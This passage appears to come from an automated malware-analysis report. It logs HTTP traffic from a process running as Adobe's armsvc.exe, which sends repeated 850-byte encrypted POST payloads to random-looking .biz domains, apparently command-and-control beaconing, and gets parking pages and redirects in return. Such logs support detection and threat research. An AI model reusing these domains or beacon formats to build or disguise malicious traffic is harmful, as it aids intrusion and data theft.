                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.148611069 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 104
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Request-ID: 58ed4e033e2be769380a549f688a2553
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.224916754.244.188.177803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.714670897 CET348OUTPOST /mlvmnwk HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.714715004 CET850OUTData Raw: 26 f8 f7 87 5b c5 88 2e 46 03 00 00 8c 2e 8e 11 9e 6f af 8d 77 86 27 ff e7 cc 23 40 d3 ec 80 f3 6c 4e be b4 98 4a 80 11 88 20 16 d4 c4 b2 84 82 b9 35 f9 9c a5 39 38 08 6e 9c 6d 8e 58 23 78 91 78 f7 ea 76 d7 d0 4c 96 2d 69 ec ea c4 42 f4 ef 1a 40
                                                                                                                                                                                                                                                                        Data Ascii: &[.F.ow'#@lNJ 598nmX#xxvL-iB@Yf/m3(q2x`;g$;:6G)FyqnI!<y@e{(w5-V=Y7#8=g"YkI_ZR2v?5Uj!Xh{.GzEP<
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.427480936 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:11 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=8169c19d3eb0d3025fd06f8c9fc04bcf|8.46.123.189|1736942231|1736942231|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.224916944.221.84.105803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.915673971 CET352OUTPOST /uxiijwub HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.915673971 CET850OUTData Raw: 78 1c 0d 4f 37 a7 4d 25 46 03 00 00 b1 39 8e 86 39 96 08 ea d5 82 0c 73 b3 3b 8f a0 69 8b f1 1e 09 69 76 41 ed 3c 29 7d ea 40 fe 07 89 9f 00 25 31 e1 ad ca ff fe 4a 3a aa e3 98 71 b9 13 17 7c 1a e8 8e cb c9 16 6a c4 04 cf d9 9c 26 a4 f8 eb 84 22
                                                                                                                                                                                                                                                                        Data Ascii: xO7M%F99s;iivA<)}@%1J:q|j&"&.P&jTem9*KoLcr[&[}$l+#&n6GPry`yjvm5qiTbL0lf6NpFWZ]P^cQ@
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.382141113 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:12 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=dab28b608274ebec0a7fda0e1ac64670|8.46.123.189|1736942232|1736942232|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.224917072.52.178.23803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929582119 CET345OUTPOST /of HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929615021 CET850OUTData Raw: d1 85 f3 b7 33 9a 42 63 46 03 00 00 7d 58 1b d6 4c 5a 3d cb 7c 35 db cc cb bd 8f a5 84 84 3d a1 23 6c 4c 0d 08 39 f3 12 a1 fa 1c 3e 4c 3f 3d 35 2f 3c 21 a9 fc 13 7f be 01 39 ba 8c 6d c3 c5 1e ed 58 d2 c4 46 ed 5b a2 ab e7 9a ee 0d 98 0b 1d 12 68
                                                                                                                                                                                                                                                                        Data Ascii: 3BcF}XLZ=|5=#lL9>L?=5/<!9mXF[hxc1ctv{+LEw 65dQ"=6h0aJya7(|Gt?-5=Y#%7YWON=p_Lw0]S[m)
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.485886097 CET276INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:13 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/of?usid=20&utid=14164916598
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.590998888 CET359OUTPOST /tbjnflaqienlofab HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.591046095 CET850OUTData Raw: 6f 6c 14 70 ce 13 1a b3 46 03 00 00 1f 26 5b 29 2c 00 cb 9c 98 c8 51 5e 25 6f 1b 79 59 c9 cb 42 3b 31 c5 0d 5b 5e 13 6b 7f e1 7c b4 71 11 0b a4 29 b4 4b cf 2e eb 32 79 e3 36 e2 35 41 b0 9f 53 ce 84 27 ae 64 e0 a4 e9 40 90 09 b2 04 c1 34 61 3d 33
                                                                                                                                                                                                                                                                        Data Ascii: olpF&[),Q^%oyYB;1[^k|q)K.2y65AS'd@4a=3Gn8rbRJte7oS9^8Nuw}oJZGFKgZD2fUc`ys|GzF0j}d^#oIfB<o+=0>F`BBB
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.747982025 CET290INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/tbjnflaqienlofab?usid=20&utid=14164917114
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992872000 CET290INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Location: http://ww7.przvgke.biz/tbjnflaqienlofab?usid=20&utid=14164917114
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.2249171199.59.243.228803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160757065 CET352OUTGET /of?usid=20&utid=14164916598 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww7.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636079073 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        date: Wed, 15 Jan 2025 11:57:13 GMT
                                                                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        content-length: 1130
                                                                                                                                                                                                                                                                        x-request-id: 0a808586-8109-4722-9577-571f8d3c78d9
                                                                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_o9zahp2cR69YCvZyckUXGf40j7HkCcio8ytXTRK0TTaBNS8ydemdiX4tmzdr6hpAdVEOr+fCXcb56gZW3Vwnuw==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=0a808586-8109-4722-9577-571f8d3c78d9; expires=Wed, 15 Jan 2025 12:12:14 GMT; path=/
                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 39 7a 61 68 70 32 63 52 36 39 59 43 76 5a 79 63 6b 55 58 47 66 34 30 6a 37 48 6b 43 63 69 6f 38 79 74 58 54 52 4b 30 54 54 61 42 4e 53 38 79 64 65 6d 64 69 58 34 74 6d 7a 64 72 36 68 70 41 64 56 45 4f 72 2b 66 43 58 63 62 35 36 67 5a 57 33 56 77 6e 75 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_o9zahp2cR69YCvZyckUXGf40j7HkCcio8ytXTRK0TTaBNS8ydemdiX4tmzdr6hpAdVEOr+fCXcb56gZW3Vwnuw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636101007 CET564INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE4MDg1ODYtODEwOS00NzIyLTk1NzctNTcxZjhkM2M3OGQ5IiwicGFnZV90aW1lIjoxNzM2OTQyMjM0LCJwYWdlX3VybCI6I
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.774323940 CET366OUTGET /tbjnflaqienlofab?usid=20&utid=14164917114 HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Host: ww7.przvgke.biz
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.878885031 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        date: Wed, 15 Jan 2025 11:57:15 GMT
                                                                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        content-length: 1150
                                                                                                                                                                                                                                                                        x-request-id: a7a1062b-0013-47f8-b637-ac12722b82e5
                                                                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kby6fQqcoVMIMbR9DNo09S6tl9CaWWErOfZuHQvQL0+flG2T4NVMX69oPW+Oc4EwvZZJpRcJq+p62Jf/e12ekQ==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=a7a1062b-0013-47f8-b637-ac12722b82e5; expires=Wed, 15 Jan 2025 12:12:15 GMT; path=/
                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 62 79 36 66 51 71 63 6f 56 4d 49 4d 62 52 39 44 4e 6f 30 39 53 36 74 6c 39 43 61 57 57 45 72 4f 66 5a 75 48 51 76 51 4c 30 2b 66 6c 47 32 54 34 4e 56 4d 58 36 39 6f 50 57 2b 4f 63 34 45 77 76 5a 5a 4a 70 52 63 4a 71 2b 70 36 32 4a 66 2f 65 31 32 65 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kby6fQqcoVMIMbR9DNo09S6tl9CaWWErOfZuHQvQL0+flG2T4NVMX69oPW+Oc4EwvZZJpRcJq+p62Jf/e12ekQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.879007101 CET584INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdhMTA2MmItMDAxMy00N2Y4LWI2MzctYWMxMjcyMmI4MmU1IiwicGFnZV90aW1lIjoxNzM2OTQyMjM1LCJwYWdlX3VybCI6I


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.224917218.141.10.107803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003444910 CET358OUTPOST /dcbbaoyhlxdmix HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003459930 CET850OUTData Raw: 9d b9 8a 5a 13 9f 41 39 46 03 00 00 2d e9 4c 49 8b c5 cd c1 bd 63 dc 4a b4 b1 21 94 3a ce 31 30 93 51 d2 7d 88 01 ea bb 60 b1 fb 90 9a b4 4b 0e 08 c1 bc 60 62 81 3e c3 ee 34 d9 77 c9 cd 53 71 a2 a4 ef 00 df 21 40 f3 1f 1c bc d3 c3 06 e6 63 07 61
                                                                                                                                                                                                                                                                        Data Ascii: ZA9F-LIcJ!:10Q}`K`b>4wSq!@ca[Bd04(^s-C}#A:PK9^c<#KfM4@e|P%F53VRkHjMbO2uH#Gbk6*$]&npw^waJ?AZX'Y
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374181032 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=54e0b9f2dcbbee863adc484a8ec4bdf3|8.46.123.189|1736942237|1736942237|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.224917382.112.184.197803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900938034 CET358OUTPOST /mgjwfjfoigllfjqd HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900959969 CET850OUTData Raw: 9f 00 e4 93 27 73 a5 41 46 03 00 00 52 9a 7a 5c 97 2d df f5 5f c8 16 a6 30 ba dc b7 2a 66 06 f0 9a ac 07 d3 ae d4 94 dd 69 3b 95 2d 09 ae 40 0c d8 50 06 78 97 9e 32 d2 e1 b9 55 30 41 45 4f 2a 22 3b b2 a8 0a 35 74 6a f8 fb 94 bc 73 54 ff 44 51 ad
                                                                                                                                                                                                                                                                        Data Ascii: 'sAFRz\-_0*fi;-@Px2U0AEO*";5tjsTDQ#w($kf:y]S)]7\jg(NU2 $Hdix7$Wu e>|g)^)j5\:EaU^|Io&GoT]g/Y=sTo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.224917482.112.184.197803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316378117 CET351OUTPOST /kieltrnsm HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316396952 CET850OUTData Raw: d8 54 d4 28 a5 f6 19 1c 46 03 00 00 c3 9a db 9d ec 7c b1 27 a1 04 93 f6 0d e5 15 39 e2 52 90 33 e5 a8 7e 5a af 4d f0 d4 bc e7 fc 3d 8d 94 2b 03 8e e2 ee 57 ef 3a 71 fe 14 11 8a aa c7 84 5e ab 97 4c d2 b1 83 0c a3 db 89 2b 32 8b bc 2e 99 c9 cf 36
                                                                                                                                                                                                                                                                        Data Ascii: T(F|'9R3~ZM=+W:q^L+2.6(EiDe5Zf!8y\lDpsu~7Gv:N\*uJQ/cXObKD\VZbo)z+k2\17m


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        11192.168.2.224917554.244.188.17780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655831099 CET346OUTPOST /j HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
